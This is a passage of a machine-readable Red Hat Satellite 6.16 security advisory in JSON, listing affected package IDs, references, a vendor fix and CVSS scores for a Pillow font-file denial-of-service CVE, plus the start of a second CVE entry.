"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-54297",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-24T17:01:10.032866+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
